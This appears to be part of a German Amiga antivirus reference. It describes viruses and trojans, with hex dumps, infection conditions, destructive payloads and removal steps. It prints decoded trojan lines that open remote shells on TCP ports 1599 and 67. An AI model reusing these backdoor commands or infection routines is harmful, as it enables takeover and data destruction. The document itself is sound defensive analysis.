haben: Es werden bei der Codierung 2 eor-Befehle abgearbeitet. Einer davon: eori.w #$DEAD,(a0). Ein codierter Block wird gekennzeichnet mit: move.w #$AFFE,(a0)+ Block: 11 0000: AFFE0008 de51d890 de57de77 de55dfb2 .....Q...W.w.U.. ^^^^^^^^ Diese Bloecke werden sauber abgearbeitet, solange das Virus- teil im Speicher aktiv ist. Ohne das Virusteil meldet das Amiga-Betriebssystem Pruefsummenfehler. Eine KOMPLETTE Disk war SEHR SCHNELL verseucht. Wichtig: Es wird NICHT NUR der 1.Block eines Files codiert !!! VT bietet Decode an. Falls Sie im File- oder BlockKetteTest die Meldung "von Pest. cod." bekommen, brechen Sie bitte sofort ab. Der Ausbau im Filetest ist viel zu langsam. Gehen Sie in BlockITest. Warten Sie auf die Decode-Frage. Klicken Sie auf Decode. Rufen Sie danach die einzelnen Tests zur Sicherheit noch einmal auf. Test 09.12.94: BB-Erkennung und Speichererkennung (VT versucht alle Vektoren in den Originalzustand zurueckzusetzen). Test 10.12.94: Decodier-Routine - PHA Trojan Filename: pha-1994.exe Begleittext: P H E N O M E N A ' 9 3 - SWEDISH ELITE! usw. siehe auch bei CLP-Trojan, UA62-ACP-Trojan ZerstoerungsFile: Gepackt: Laenge 57508 Bytes Entpackt: Laenge 120624 Bytes Keine verbogenen Vektoren. Keine Vermehrung Es handelt sich um eine CLP-Variante (Text geaendert), die an ein XCopy mit Weihnachtsmotiv gehaengt wurde (mit $4EB9-$4EF9-Link). Im XCopy-Teil wurde eine Versionsangabe gefunden:xcopver 24564552 3a205843 6f707920 31322e39 $VER: XCopy 12.9 33006100 2d286100 01c02c79 00000004 3.a.-(a...,y.... Ob es diese Version wirklich gibt, kann ich nicht sagen. Schaden: Schreibt in alle Files in S: egal ob Data oder Prg. einen Text. Ed-startup vorher: 73692030 20203120 2250726f 6a656374 si 0 1 "Project 220a7369 20312020 3220224f 70656e2e ".si 1 2 "Open. 2e2e2020 20204553 436f7022 20226f70 .. ESCop" "op 203f202f 46696c65 3a202f22 0a736920 ? /File: /".si 32202034 0a736920 33202032 20225361 2 4.si 3 2 "Sa Ed-startup nachher: 64522e57 486f2077 69736865 7320796f dR.WHo wishes yo 75206120 68617070 79206e65 77207965 u a happy new ye 6172212e 2e2e2054 68697320 77617320 ar!... This was 646f6e65 20696e20 31737420 6a616e75 done in 1st janu 61727920 31393934 2054494d 453a2030 ary 1994 TIME: 0 393a3030 2e2e2e20 68616821 2e2e2e20 9:00... hah!... 4f4b2e2e 2e205068 756b6b20 74686973 OK... Phukk this 20677579 73207570 20666f72 20757320 guys up for us 3a205248 59532f46 4149524c 49474854 : RHYS/FAIRLIGHT 2c204543 484f2647 5549444f 20414e44 , ECHO&GUIDO AND 20414c4c 204e415a 49205348 49544845 ALL NAZI SHITHE 41445321 2053544f 50204641 53434953 ADS! STOP FASCIS 4d202a4e 4f57212a 2e2e2e20 20202f64 M *NOW!*... /d 522e5748 4f212022 0a736920 38202031 R.WHO! ".si 8 1 Die Files werden unbrauchbar und VT bietet loeschen an. Die Wirkungsweise ist also aehnlich wie bei CLP-Trojan (hab ich nicht). Fileerkennung: gepackt: VT erkennt PHA Trojan mit FRAGEZEICHEN. VT kann sich also taeuschen. Bitte kopieren Sie das Teil auf eine leere Disk und entpacken sie das Teil mit einem Prg. ihrer Wahl. entpackt: VT erkennt PHA Trojan ohne Fragezeichen. Es handelt sich um einen 4EB9-4EF9-Link. Wenn Sie das XCopy-Teil unbedingt ausprobieren wollen, so waehlen Sie Ausbau. Falls das Teil nach dem Ausbau NICHT laeuft, dann gehen Sie bitte in den Filerequester und schalten dort mit 1Linkaus das Trojanteil ab. Aber noch einmal: Ich kenne dieses XCopy-Teil NICHT. Es koennen sich in diesem Teil weitere Gemeinheiten befinden. Kaufen Sie ein Original-XCopy, wenn Sie so etwas brauchen. - PHANTOM-Inst. File Bekannter Filename: SuperNovaKiller Laenge ungepackt: 4792 Bytes Verbogener Vektor: Loadseg Nicht resetfest VT bietet Loeschen an Im File ist zu lesen: 6c696272 61727900 9b316d9b 33336d53 library..1m.33mS 75706572 4e6f7661 4b696c6c 657220a9 uperNovaKiller . 20627920 53616665 b7486578 b7496e74 by Safe.Hex.Int - PHANTOM-Virus Link Fileverlaengerung: 688 Bytes verbogener Vektor: LoadSeg VT versucht den Vektor im Speicher neu zu setzen. Namensbegruendung: Mehrfach decodiert ist im Linkteil zu lesen: 6c65 le 74732067 6f206167 61696e2e 2e2e5048 ts go again...PH 414e544f 4d00 ANTOM. VT versucht das Linkteil auszubauen und den Original-Sprungbefehl im File wieder zu setzen. Das Teil ist hinter den ersten Hunk gelinkt und immer neu mit Wert aus $DFF006 codiert. Linkbedingungen: - 3F3 u. 3E9 wird gefunden - File groesser #4000 und kleiner #190000 - File noch nicht verseucht ( 1 LW-Test ) - Suche nach $4EAE ( jsr -xy(Lib-Base) ) ( xy ist variabel ) - Falls gefunden, Test ob Abstand zu Hunkendealt kleiner $7FFE. - $4EAE wird in $4EBA ( jsr Hunkendealt(PC) ) geaendert. vgl. auch Ebola usw. - PIF-Virus s.o. bei MENEM'S REVENGE Der codierte DisplayAlert-Text ist nicht geaendert. - PLASTIQUE BB Cool $7ED5E immer ab: $7EC00 auch KS2.04 von der Definition kein Virus, da keine Vermehrung. Die Routinen sind zwar vorhanden, werden aber NIE erreicht. Namensbegruendung: im BB zu lesen: 00000000 00000000 00000000 003e3e3e .............>>> 2050204c 20412053 20542049 20512055 P L A S T I Q U 20452020 3c3c3c2e 2e2e2e00 00000000 E <<<......... Grundgeruest ist der 16-Bit-Crew-BB. Der Cool-Einsprung wurde geaendert, deshalb ist keine Vermehrung ueber DoIo moeglich. Schaeden: Sobald eine Zaehlzelle den Wert #10 erreicht hat, werden mehrere Vektoren auf den ROM-Beginn verbogen, d.h. sobald die Vektoren benutzt werden, wird ein Absturz her- vorgerufen. - Poland-LVirus Linkvirus Namensbegruendung: siehe bei Zerstoerung Fileverlaengerung: #840 Bytes Nicht Resetfest Verbogener Vektor: DoIo LoadSeg Fehlerquelle: kein Test auf KS1.3 (Loadseg) Speicherverankerung: - Test ob schon im Speicher - Loadseg und DoIo wird verbogen - Testet spaeter geladene Filenamen auf "v" oder "V". Linkvorgang: - mit LoadSeg - File noch nicht verseucht - Medium validated - 4 Block frei - Filelaenge kleiner #157196 - File ausfuehrbar ($3F3) - CodeHunk wird gefunden ($3E9) - 1.Hunk nicht groesser als #32764 (wg. Sprung) - Das erste LW des 1.Hunks wird durch bsr Virus ($6100wxyz) ersetzt. - Link hinter den 1.Hunk - das Teil codiert sich immer neu mit $DFF00A Zerstoerung: - mit DoIo - kein Test auf trackdisk.device (also auch HD !!!) - Blocknummer wird mit $DFF006 bestimmt, muss aber groesser als #63 ($7E00/#512) sein. Bei zwei Filesystemen im Rigid- bereich, koennte das Teil also auch dort zerstoeren. - In den Block wird ab $1f8 *Poland* geschrieben. Da ist nichts mehr zu retten. Block: 1345 000: 00000008 00000510 00000031 000001e8 ...........1.... ;...... 1f0: e3dbe3db e3dbe3db 2a506f6c 616e642a ........*Poland* VT versucht Vektoren im Speicher zurueckzusetzen. VT versucht den Fileausbau. VT sollte bei BlockITest zerstoerte Bloecke finden. - POLISH BB Cool, DoIo auch KS2.04 BB codiert mit Wert aus $DFF006 Schaeden: Vermehrung mit BB Sobald Zaehlzelle 8 erreicht hat: DisplayAlert Unterschied zu anderen Chaos-BBen: add.b d0,(a0)+ durch eor.b d0,(a0)+ ersetzt. Decodierter DisplayAlert-Text: 61636b64 69736b00 00960c50 4f4c4953 ackdisk....POLIS 4820502d 31422049 53205255 4e4e494e H P-1B IS RUNNIN 472e2e20 20202020 2047454e 45524154 G.. GENERAT 494f4e20 3a203030 32320000 000048e7 ION : 0022....H. siehe auch: Chaos, Taipan-Lameblame, CHEATER HIJACKER, Taipan- Chaos, Lameblame, - POLISHPOWER-Virus Linkvirus Namensbegruendung: Im decodierten LinkTeil ist zu lesen: b210504f 4c495348 20504f57 45520a74 ..POLISH POWER.t Fileverlaengerung: #5000-6814 Bytes Nicht Resetfest mind KS #36 bei mir mit Cache an immer GURU Verbogene Vektoren: keine bekannten Vektoren Speicherverankerung: - oeffnet timer.device Unit 1 - neuer Prozess (Name NEW PROCESS) - neuer Port (Name xyzPolishPowerxyz) (xyz stehen fuer Buchstabenmuell mit variabler Anzahl) - Prozess und Port werden nach kurzer Zeit aus den Listen wieder entfernt, aber NICHT aus dem Speicher. Fuer den Linkvorgang wird der Prozess wieder in die Liste fuer kurze Zeit eingetragen. Die Technik, einen Prozess der NICHT in der Liste steht, trotzdem zu aktivieren, ist fuer mich NEU !!!!!!! Linkvorgang: - Es entsteht ein File mit nur einem Hunk. Am Anfang steht eine Decodierroutine. Diese Routine aendert immer die Laenge und es werden immer andere Codierbefehle verwendet. Danach folgt das eigentliche Virusteil und danach das Originalfile. Dieses Originalfile kann nicht einfach ausgescnitten werden, da der Anfang variabel (Tiefe und Codierart) codiert sind. - Bedingungen: - File ausfuehrbar (3F3) - File groesser #2000 Bytes - File kleiner #150000 Bytes Hinweis Nov 98: Da ich die Verankerung im Betriebssystem NICHT gefunden habe, muss VT den ganzen Speicher durchtesten. Das braucht Zeit. Deshalb erscheint ein MemTest-Requester beim Start von VT. Im Programm wird NICHT laufend nach POLISH- POWER im Speicher gesucht (nach anderen Viren schon). Wenn Sie in VT spaeter wieder suchen wollen, gehen Sie bitte in Tools und dann PolPower. Danke Nachtrag Nov 98: einige Tel.-Anrufe - Warum kein Requester bei KS1.3 ? Weil das Teil erst ab KS2.04 laeuft. Ein Memtest ist also ueberfluessig. - Bei 68060 braucht der Requester laenger als der Speichertest ! In Ordnung, ich schalte in VT3.11 beim 68060 den Requester ab, und fuehre gleich einen Speichertest durch (Mauszeiger aendert sich). Laufend testet VT immer noch nicht auf PolishPower. Gehen Sie bitte ab und zu in VT/Tools/PolPower. Nachtrag Dez 98: Es sind jetzt einige Files mit Mehrfach-Verseuchung vorhanden (Danke). Erzeugt mit PC-UAE (Fremdaussage). Das heisst, die vorhandene "Schon-verseucht-Routine" ist bei UAE wirkungslos. Meine Tests auf einem Amiga eine Mehrfach- verseuchung zu erreichen, waren erfolglos. - PolPow-antonio-Vir. Linkvirus Namensbegruendung: Es wurden die Codier-Routine (ungewoehnliche Befehle entfernt) und die Link-Routine "ausgeliehen". Im decodierten LinkTeil ist zu lesen: 646f732e 6c696272 61727900 dos.library. 74696d65 722e6465 76696365 006d6169 timer.device.mai 6c2e686f 746d6169 6c2e636f 6d004652 l.hotmail.com.FR 4f4d3a3c 6d654079 61686f6f 2e636f6d OM:<me@yahoo.com 3e00546f 3a3c616e 746f6e69 6f5f6c65 >.To:<antonio_le 76694068 6f746d61 696c2e63 6f6d3e00 vi@hotmail.com>. 0d0a2e0d 0a006273 64736f63 6b65742e ......bsdsocket. 6c696272 61727900 6d69616d 692e6c69 library.miami.li 62726172 79006d69 3000 brary.mi0. Das timer-device wird aber ueber diese Stelle nie aufgerufen. Also ein Hinweis, dass einfach Teile uebernommen wurden. Fileverlaengerung: #5900-7858 Bytes Wegen einer kleine Ungereimtheit kommt es SEHR haeufig zu 2 Link ans gleiche File bei EINEM Durchgang !!! Nicht Resetfest mind KS #36 Verbogene Vektoren: Nein Speicherverankerung: KEIN Code dafuer vorhanden (Unterschied zu PolishPower) Zwei negative Jobs werden ausgefuehrt: 1.Job: bsd.lib und miami.lib werden gesucht und danach Sprungbefehle (hab keine lib-Beschreibung) aus diesen ausgefuehrt. hotmail (siehe oben) usw. wird abgearbeitet. 2.Job: Task-Liste wird nach Prozessen durchsucht. Die dazugehoerenden Files sollen verseucht werden. Die Prozesse werden gekennzeichnet. Die Files koennen natuerlich nicht immer gefunden werden z.B. workbench-Prozess Linkvorgang: - Es entsteht ein File mit nur einem Hunk. Am Anfang steht eine Decodierroutine. Diese Routine aendert immer die Laenge und es werden immer andere Codierbefehle verwendet. Danach folgt das eigentliche Virusteil und danach das Originalfile. Dieses Originalfile kann nicht einfach ausgeschnitten werden, da der Anfang variabel (Tiefe und Codierart) codiert sind. Abhaengig von $DFF006 aendert sich das Linkteil. Da die Files nicht markiert sind, sind Mehrfach-Links (nach Reset) moeglich. Ich hab mit dem Test nach 20 Links aufgehoert. - Bedingungen: - Medium valid - mind. #100 Block frei - File groesser #2000 Bytes - File kleiner #1 Million Bytes !!!!! - File ausfuehrbar (3F3) 3.Job: Das Original-File wird ausgefuehrt. Es wird NICHT versucht, das Virusteil im Speicher zu verankern. Das Teil muss also auch nicht im Speicher gesucht werden. Ein neuer Verseuchungsversuch wird erst dann gestartet, wenn wieder ein verseuchtes File gestartet wird. VT durchsucht immer wieder die Taskliste nach der Markierung. Falls also im Programm der Requester "PolPow-antonio-Vir. war im Speicher" erscheint, dann sollten Sie vorsichtig werden. Bei PolPow-antonio und POLISHPOWER sind in der Markierung gleich !!! Hinweis Dez 98: Da ungewoehnliche Befehle aus der Codier-Routine entfernt wurden, ist die Erkennung schwerer geworden. Es koennte zu Fehlerkennungen kommen. Bitte melden Sie sich dann mit einem Beispielfile. VT findet das Teil NUR !!!! bei Filetest. - Polyzygotronifikator Virus Link Verbogener Vektor: LoadSeg Resetfest: Nein Versucht dos.lib mit #37 zu oeffnen Minimale Verlaengerung: 1248 Bytes Maximale Verlaengerung: 1296 Bytes Virusteil wird hinter ersten Hunk gesetzt. Arbeitet NICHT mit SnoopDos im Speicher. Ueberspringt 3E8-, 3F0- und 3F1-Hunks !!!!!!!! Die Codierung und Laenge des Teils wechseln in Abhaengigkeit von $DFF006, $DFF007 und $DFF00A . Namensbegruendung: Decodiert ist im Speicher zu lesen: 3800d173 38005483 4e75001b 536e6f6f 8..s8.T.Nu..Snoo 70446f73 0000646f 732e6c69 62726172 pDos..dos.librar ;..... 69746820 74686520 506f6c79 7a79676f ith the Polyzygo 74726f6e 6966696b 61746f72 2e2e2e20 tronifikator... Das Teil meldet sich nie. Speicher: Testet auf #"1994" (Text), ob LoadSeg schon verbogen. Speichermedium: - validated - mind. #8000 Blocks (also keine Disk) - mind. #10 Blocks frei File: - Filename enthaelt nicht "." oder "-" . Also z.B. kein Befall von .library, .info, .device oder -handler. - Test auf schon befallen mit $1994 (Hex) am Ende des ersten Hunks. 96df9091 8fe61994 000003f2 000003eb ................ ^^^^ ($BB8+$7FFE) - erster Hunk Laenge max. #35766 ($BB8+$7FFE) - $3E9 wird gefunden . - move.l 4,a6 (6 Bytes) oder move.l 4.w,a6 (4 Bytes) wird in den ersten 3000 Bytes des 1.Hunks gefunden. - Der Abstand von diesem Punkt zum Originalende des 1. Hunks ist nicht groesser als $7FFE. Falls diese Bedingungen zutreffen, wird der move.l 4-Befehl durch einen BSR-Befehl ($6100uvwx) ersetzt. Falls der Original- Befehl sechs Bytes lang war, wird noch ein NOP gesetzt, um die Laenge anzugleichen. Der move.l 4-Befehl wird dann im Virusteil ausgefuehrt. Die Codierung findet in einer doppelten eori.b- Schleife statt. Die variable Virusteillaenge ergibt sich durch einige BRA.S-Spruenge im angehaengten Teil, deren Zieladressen in gewissen Grenzen (andi.b $F,d5) variabel sind. Die variablen Zwischenraeume werden mit Codier-Muell gefuellt. VT2.66 sollte das Teil ausbauen koennen. Es wird IMMER move.l 4.w,a6 zurueckgeschrieben, d.h. es koennte im 1.Hunk ein NOP verbleiben, welches im Originalfile nicht vor- handen war. Das macht NICHTS . Die Filelaengen des Originalfiles und des ausgebauten Files muessen aber uebereinstimmen !!!! VT kann am verseuchten File nicht feststellen, ob das NOP vom Programmierer gewollt war, oder vom Virusteil erzeugt wurde. WICHTIG !!!!! Das Virusteil kann von VT nur beim Filetest sicher (????) ge- funden werden. Beim BlockI- oder BlockKette-Test kann es vorkommen, dass ein Teil der Testlangworte, die VT verwendet, in Block A und die restlichen LWe in Block B liegen. Da VT keine Uebereinstimmung feststellt, wuerde KEINE Meldung erfolgen. Falls beim Ausbau Fehler auftreten, bitte ich um eine Nach- richt. Danke Hinweis 06.12.94: Es ist ein Antivirusprogramm auf dem Markt, das mit dem Ausbau nicht zurechtkommt. Deshalb wird nur der BSR-Befehl ersetzt. Das eigentliche Virusteil BLEIBT IM File (starke Leistung). VT findet in einem so behandelten File immer noch das Virusteil, aber nicht mehr den BSR-Befehl. Um dennoch einen Ausbauversuch zu ermoeglichen, erscheint in diesem Fall ab VT2.70 ein Requester "BSR-Befehl fehlt !! Ausbau ??". Sie koennen damit einen Ausbau- versuch unternehmen oder abbrechen. Ob es aber meine Aufgabe ist, halbe Arbeit von anderen Programmen nachzubessern, stelle ich in Frage. Es ist das gleiche Programm, das bis heute (2,5 Jahre spaeter) nicht in der Lage ist den Crime92 zu erkennen (wird aber in den Docs auch zugegeben). Der Programmierer scheint auch nicht gemerkt zu haben, dass dieses Virusteil 3e8-3f1-Hunks ueberlaeuft. In diesen Files wird das Virusteil NIE gefunden. Dabei waere eine Testverseuchung des Files lawbreaker so einfach gewesen. Hinweis 07.12.94: Es ist ein weiteres Antivirusprogramm auf dem Markt, das zwar alle normale Files sauber behandelt, aber eben- falls mit 3E8-3F1-Hunks NICHT zurechtkommt. - Port-1599-Trojan (Computer-Uebernahme) Ein ARexx-Programm Die Codier-Routine entspricht aufs Byte der Routine von Port-67-Trojan. Mehrere Files sind notwendig VT bietet loeschen an. Bitte kopieren Sie den Original-Loadwb- Befehl neu. WICHTIG !!! WICHTIG !!!! Das Installer-File und/oder Archiv ist UNBEKANNT. Bitte suchen Sie mit ??? c:loadwb (falsch) gepackt: 1192 Bytes entpackt: 748 Bytes l:startup.handler (loadwb echt) 1136 Bytes l:background.handler 1700 Bytes Meine Meinung: KEIN Programm OHNE Hintergedanken verschiebt ein Programm aus c: nach l: und nimmt dessen Name an. In loadwb (falsch) entpackt ist zu lesen: ffdc7000 4e5d4e75 52554e20 3e4e494c ..p.N]NuRUN >NIL 3a204c3a 6261636b 67726f75 6e642e68 : L:background.h 616e646c 6572004c 3a737461 72747570 andler.L:startup 2e68616e 646c6572 00726578 786d6173 .handler.rexxmas 74004e49 4c3a0000 74ff4e75 4e750000 t.NIL:..t.NuNu.. In Wirklichkeit werden also mit DOS-Execute drei Programme gestartet. Im background-File ist uncodiert zu lesen: 01014e75 24564552 3a204247 48616e64 ..Nu$VER: BGHand 6c657220 322e3120 2831392e 392e3934 ler 2.1 (19.9.94 29204368 696c6474 616b206d 616e6167 ) Childtak manag 656d656e 7420686e 64720a00 ement hndr.. background.handler enthaelt einen mehrfach-codierten Bereich. Im Speicher entsteht: 00000043 54455354 313a3b61 64647265 ...CTEST1:;addre 73732063 6f6d6d61 6e642027 57616974 ss command 'Wait 20313020 6d696e27 3b3b6966 2073686f 10 min';;if sho 77282770 272c274d 49414d49 2e312729 w('p','MIAMI.1') 20746865 6e207369 676e616c 20534e4f then signal SNO 4f505445 53543b65 6c736520 7369676e OPTEST;else sign 616c2054 45535432 3b544553 54323a3b al TEST2;TEST2:; 3b696620 73686f77 28277027 2c27414d ;if show('p','AM 49544350 27292074 68656e20 7369676e ITCP') then sign 616c2053 4e4f4f50 54455354 3b656c73 al SNOOPTEST;els 65207369 676e616c 20544553 54313b53 e signal TEST1;S 4e4f4f50 54455354 3a3b6966 2073686f NOOPTEST:;if sho 77282770 272c2753 4e4f4f50 444f5327 w('p','SNOOPDOS' 29205448 454e2044 4f3b6164 64726573 ) THEN DO;addres 7320736e 6f6f7064 6f732071 7569743b s snoopdos quit; 454e443b 7369676e 616c2053 434f5554 END;signal SCOUT 54455354 3b53434f 55545445 53543a3b TEST;SCOUTTEST:; 69662073 686f7728 2770272c 2753434f if show('p','SCO 55542e31 27292054 48454e20 444f3b61 UT.1') THEN DO;a 64647265 73732073 636f7574 2e312051 ddress scout.1 Q 5549543b 454e443b 7369676e 616c2050 UIT;END;signal P 4f52543b 504f5254 3a3b6164 64726573 ORT;PORT:;addres 7320636f 6d6d616e 64202752 756e203c s command 'Run < 3e4e494c 3a204e65 77736865 6c6c2054 >NIL: Newshell T 43503a31 35393927 3b736967 6e616c20 CP:1599';signal 54455354 313b6578 69740000 TEST1;exit.. Eine ARexx-Programmierung, eine Zeitschleife, Test auf Snoopdos und Scout, newshell. Nach Fremdaussage: Es sollen unberechtigte Zugriffe (Passwoerter ausspaehen, Format Partition) erfolgt sein. Nachtrag 98-03-05: Es haben mich mehrere E-Mails erreicht. Der 1599-Port scheint "Insidern" seit einiger Zeit bekannt zu sein. Die entsprechenden Amiga-Programme sollen inzwischen Abwehreintraege erlauben. siehe auch Port-67-Trojan - Port-67-Trojan (Computer-Uebernahme) Ein ARexx-Programm Die Codier-Routine entspricht aufs Byte der Routine von Port-1599-Trojan. VT bietet loeschen an. Filename: mkey.exe L: 1880 Bytes Nach File-ID: .--------------------------------------. |So rumour has it Holger has released a| |virus to harm users with fake miami | |keyfiles. This will check your keys to| |ensure its safe to use, dEN saves ya | |and fists Holgers ass! | `--------------------------------------' }-- dEN 3/3/98 pHuKeRs --{ Im File ist uncodiert zu lesen: 01014e75 24564552 3a202d4d 69616d69 ..Nu$VER: -Miami 204b6579 2046696c 65205661 6c696461 Key File Valida 746f7220 76312e30 2d20a964 454e5e70 tor v1.0- .dEN^p 484b2069 6e203139 39380a00 HK in 1998.. mkey.exe enthaelt einen mehrfach-codierten Bereich. Im Speicher entsteht: 00000070 2f2a202a 2f0a2020 20205361 ...p/* */. Sa 79202727 0a202020 20536179 20274d69 y ''. Say 'Mi 616d6920 4b657966 696c6520 56616c69 ami Keyfile Vali 6461746f 7220a96f 44654420 62792064 dator .oDeD by d 454e5e50 486b2031 39393827 0a202020 EN^PHk 1998'. 20536179 2027270a 20202020 53617920 Say ''. Say 27527566 662c2062 75742066 69727374 'Ruff, but first 20746f20 63686563 6b21270a 0a6f7065 to check!'..ope 6e282773 63726970 74272c27 456e7641 n('script','EnvA 72633a4d 69616d69 6368616e 67654442 rc:MiamichangeDB 272c2757 27290a77 72697465 6c6e2827 ','W').writeln(' 73637269 7074272c 27414444 20696e65 script','ADD ine 74642064 61792073 74726561 6d207463 td day stream tc 7020646f 73206269 6e205072 74206e65 p dos bin Prt ne 77636c69 20746370 3a363727 290a636c wcli tcp:67').cl 6f736528 27736372 69707427 290a0a49 ose('script')..I 46204f50 454e2827 74686572 65272c27 F OPEN('there',' 6d69616d 693a4d69 616d692e 6b657931 miami:Miami.key1 272c2752 27290a54 48454e20 63686563 ','R').THEN chec 6b322829 0a454c53 45205361 79202727 k2().ELSE Say '' 0a202020 20536179 20274b65 79203120 . Say 'Key 1 69732062 6164206f 72206e6f 6e206578 is bad or non ex 69737461 6e74270a 20202020 53617920 istant'. Say 27446964 20796f75 206d616b 65206120 'Did you make a 4d69616d 693a2061 73736967 6e20746f Miami: assign to 20796f75 72206b65 79733f27 0a202020 your keys?'. 20536179 2027270a 45786974 0a0a6368 Say ''.Exit..ch 65636b32 3a0a4946 204f5045 4e282774 eck2:.IF OPEN('t 68657265 32272c27 6d69616d 693a4d69 here2','miami:Mi 616d692e 6b657932 272c2752 27290a54 ami.key2','R').T 48454e20 646f6e65 28290a45 4c534520 HEN done().ELSE 53617920 27270a20 20202053 61792027 Say ''. Say ' 4b657920 32206973 20626164 206f7220 Key 2 is bad or 6e6f6e20 65786973 74616e74 270a2020 non existant'. 20205361 79202742 65747465 7220676f Say 'Better go 20616e64 20676574 20736f6d 65746869 and get somethi 6e672062 65747465 7221270a 20202020 ng better!'. 53617920 27270a45 7869740a 0a646f6e Say ''.Exit..don 653a0a53 61792027 270a5361 7920272b e:.Say ''.Say '+ 2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ---------------- 2d2d2d2d 2d2b270a 53617920 277c3d2d -----+'.Say '|=- 3d2d4b65 79732061 72652066 696e652d =-Keys are fine- 3d2d3d7c 270a5361 7920272b 2d2d2d2d =-=|'.Say '+---- 2d2d2d2d 2d2d2d2d 2d2d2d2d 2d2d2d2d ---------------- 2d2b270a 65786974 0a0a7265 7475726e -+'.exit..return 20310000 1.. Fremdaussage (Danke): Die kritische Zeile ist: writeln('script','ADD inetd day stream tcp dos bin Prt newcli tcp:67') Das führt dazu, daß die Einstellungen von Miami geändert werden und jedesmal beim Start ein neues CLI geöffnet wird. Dieses wird nicht mit CON: verknüpft sondern mit TCP: Port 67 Die Texte zu key1 und 2 sind nur eine Ablenkausgabe, OHNE Aussage- kraft. siehe auch Port-1599-Trojan - POWERBOMB ByteBandit/Forpib-Clone s.o. Text: POWERBOMB SYSTEMS PRESENTS: BYTE BANDIT V2.0 !!! - PowerTeam BB KickTag, KickCheckSum, BeginIo nicht mit KS2.04 Teile des BB's codiert mit eor.w d1,(a0)+ Schaeden: - Sobald die Zaehlzelle den Wert $a erreicht hat, Textausgabe mit DisplayAlert und dann bei mir Absturz. Text: Virus Meditation #0026051990.PowerTeam - pOWERtRADER-Troj. Zerstoerung Name: vom Filenamen uebernommen angeblich V2.5 Laenge gepackt: 5324 Bytes Laenge ungepackt: 48388 Bytes Keine verbogenen Vektoren Keine Vermehrung Im File ist zu lesen: ffe84e75 73637369 2e646576 69636500 ..Nuscsi.device. ;.... 48414841 48414841 48414841 48414841 HAHAHAHAHAHAHAHA 48414841 48414841 48414841 48414841 HAHAHAHAHAHAHAHA Schaden: Es wird scsi.device Unit 0 geoeffnet und mit SendIo Muell (HAHA s.o.) in einer Schleife ab Block 0 (RIGID) geschrieben. VT bietet loeschen an. - PP-Bomb Powerpacker, File-Trojan, keine Vermehrung, Vers.Nr. 3.2 - 3 Programmteile - kurzer CodeHunk mit 2 jsr-Befehlen (notwendig fuer Ablauf) - crunched Bomb-Teil - Powerpacker 3.0b (ich glaube: NICHT veraendert und nicht ge- crunched) Bomb-Teil: wird zuerst angesprungen, decrunched Laenge: 9880 Bytes Aztec-Prg mit dt. Fehlermeldungen (z.B. Fehler bei DISKFONTBASE) - sucht zuerst SnoopDos-Task; falls ja Bomb-Ende - sucht in c von dh0: und/oder dh1: nach why und setzt das File auf 0 Bytes - enthaelt alle Dos-Befehle um Files zu veraendern (sucht auch auf dh0: und dh1:, ist getestet). - soll AmiExpress veraendern (hab ich nicht) - weitere Eintraege: BBS: DH0:BBS/ DH1:BBS/ DH0: DH1: Ursprung: qtx_pow.lzh 139670 Bytes Empfehlung: (s.u.) loeschen und Original-Powerpacker aufkopieren Nachtrag 29.12.92: Es wurde mir ein weiteres verseuchtes File zugeschickt. Name: snap Laenge: 44260 Bytes Daraufhin wurden die Linkversuche mit PP wiederholt und mit snap neu durchgefuehrt. An beide Files kann sich der PP-Bomb- Teil NICHT von selbst linken. Es hat also jemand nachgehol- fen. Nachtrag 30.12.92: Es wurde in VT eine PP-Bomb-Ausbauroutine eingebaut. Diese Routine koennte wackeln. Fertigen Sie BITTE deshalb VOR dem Ausbauversuch ein Kopie an. Testen Sie nach dem Ausbau bitte die Lauffaehigkeit des verkuerzten Programms. Danke Nachtrag 16.02.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht. Haengt an Died. Died verseucht Laenge: 67028 Bytes Ausgabe: PP-Bomb 2 Besonderheit: Das PP-Bomb-Trojan-Teil wurde in der Laenge ge- kuerzt !!! Da im gepackten Teil eine Hunk-Kennung von $3EA auf $3E9 geaendert wurde, besteht Absturzgefahr ???? (2.Start von verseuchtem Died auf A4000 = GURU) Erkennung und Ausbau mit VT getestet: 16/17.02.93 Nachtrag 17.02.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht. Haengt an MegaMon. MegaMon verseucht Laenge: 26856 Bytes Ausgabe: PP-Bomb 3 Besonderheit: Das PP-Bomb-Trojan-Teil wurde in der Laenge ge- kuerzt !!! Erkennung und Ausbau mit VT getestet: 17.02.93 Nachtrag 10.12.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht. Haengt an Died V2.8 . Died V2.8 verseucht UND gepackt Laenge: 31320 Bytes Besonderheit: Es handelt sich um das verseuchte Died-Prg. (s.o.). Die ASCII-Version wurde erhoeht, der PP-Bomb-Teil mit $4eb9 ange- linkt und dann das ganze File noch gepackt. VT bietet loeschen an. Wenn Sie das Died-Prg. V2.8 umbedingt haben wollen (es ist wirk- lich nur ein ASCII-Fake), so entpacken Sie bitte das Prg. Danach bietet VT Ausbau an. Died V2.8 Virusteil ausgebaut Laenge: 61692 Bytes Erkennung und Ausbau mit VT getestet: 10.12.93 Nachtrag 25.12.93: Es ist ein weiterer PP-Bomb Clone aufgetaucht. Haengt an ModuleMaster V1.7 . ModuleMaster verseucht Laenge : 20364 Bytes ModuleMaster Virusteil ausgebaut : 15108 Bytes Ausgabe: PP-Bomb 4 Erkennung und Ausbau mit VT getestet: 25.12.93 PP-Bomb-Virusteil entpackt Auszug: 42425300 BBS. 44483000 44483100 44483000 44483100 DH0.DH1.DH0.DH1. 4242533a 00444830 3a424253 2f004448 BBS:.DH0:BBS/.DH 313a4242 532f0044 48303a00 4448313a 1:BBS/.DH0:.DH1: ...... 536e6f6f 70446f73 00433a57 `...SnoopDos.C:W 68790077 hy.w - PP veraendert VT glaubt einen PP-Hunk gefunden zu haben, bei dem die Hunk- laenge ($83, $9E) NICHT stimmt. Es kann auch eine FEHLMELDUNG sein !!!! Schauen Sie sich bitte das File etwas genauer an, ob nicht ein unbekanntes Teil nach dem Entpackheader (aber vor dem Data- Hunk) eingebaut wurde. - PRIMAVERA-Virus BB EXTREME-Clone siehe oben Nur Text geaendert. Im BB ist zu lesen: 696f6e2e 6c696272 61727900 00b01554 ion.library....T 68652052 65747572 6e206f66 20507269 he Return of Pri 6d612056 65726120 56697275 73212121 ma Vera Virus!!! - PROMOTER Virus Laenge: 1848 Bytes Name: Disk-Validator KS1.3: ja KS2.04: nein Disk-Validator im ROM Resetfest: nein Verbogene Vektoren: nein 